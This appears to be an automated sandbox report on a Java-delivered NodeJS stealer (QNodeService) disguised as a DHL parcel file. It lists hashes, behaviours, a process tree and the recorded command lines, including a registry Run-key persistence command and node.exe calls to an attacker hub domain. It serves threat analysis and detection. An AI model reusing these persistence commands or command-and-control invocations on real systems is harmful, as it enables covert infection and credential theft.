Analysis
-
max time kernel
92s -
max time network
111s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
15-10-2020 12:48
Static task
static1
Behavioral task
behavioral1
Sample
dhlpaket.jar
Resource
win7
Behavioral task
behavioral2
Sample
dhlpaket.jar
Resource
win10v200722
General
-
Target
dhlpaket.jar
-
Size
289KB
-
MD5
b15cdc291a5e4a8535c3eb7c14eae8dc
-
SHA1
1a4070204cabeb1fe552ce0d83017dd416fc1ef5
-
SHA256
fc893170ac17a117486c0cb8e3f0733840f5e964d4134abf74c3d801df40f75a
-
SHA512
274429ccfc2d977a9d013ac788880bdb80fd3320f623042a671a2186ecc62ffb19ddcb8e452d7f1dff5a1bc66ffc4111129869ec01783bf4701a3bc5dbee000b
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3460 node.exe 3116 node.exe 916 node.exe -
Loads dropped DLL 6 IoCs
pid Process 916 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\d8d826fc-4dd3-45bd-afcd-ef19584ec2cc = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad43-168.dat js behavioral2/files/0x000100000001ad43-172.dat js behavioral2/files/0x000100000001ad43-176.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 wtfismyip.com 24 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3460 node.exe 3460 node.exe 3460 node.exe 3460 node.exe 3116 node.exe 3116 node.exe 3116 node.exe 3116 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe 916 node.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 3740 wrote to memory of 3660 3740 java.exe 73 PID 3740 wrote to memory of 3660 3740 java.exe 73 PID 3660 wrote to memory of 3460 3660 javaw.exe 77 PID 3660 wrote to memory of 3460 3660 javaw.exe 77 PID 3460 wrote to memory of 3116 3460 node.exe 79 PID 3460 wrote to memory of 3116 3460 node.exe 79 PID 3116 wrote to memory of 916 3116 node.exe 80 PID 3116 wrote to memory of 916 3116 node.exe 80 PID 916 wrote to memory of 2224 916 node.exe 82 PID 916 wrote to memory of 2224 916 node.exe 82 PID 2224 wrote to memory of 3452 2224 cmd.exe 83 PID 2224 wrote to memory of 3452 2224 cmd.exe 83 PID 916 wrote to memory of 2360 916 node.exe 84 PID 916 wrote to memory of 2360 916 node.exe 84 PID 2360 wrote to memory of 2400 2360 cmd.exe 85 PID 2360 wrote to memory of 2400 2360 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\dhlpaket.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\58b69092.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain september101991.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Dr5O8A\boot.js --hub-domain september101991.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Dr5O8A\boot.js --hub-domain september101991.ddns.net5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d8d826fc-4dd3-45bd-afcd-ef19584ec2cc" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d8d826fc-4dd3-45bd-afcd-ef19584ec2cc" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d8d826fc-4dd3-45bd-afcd-ef19584ec2cc" /F"6⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\system32\reg.exeREG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d8d826fc-4dd3-45bd-afcd-ef19584ec2cc" /F7⤵PID:2400
-
-
-
-
-
-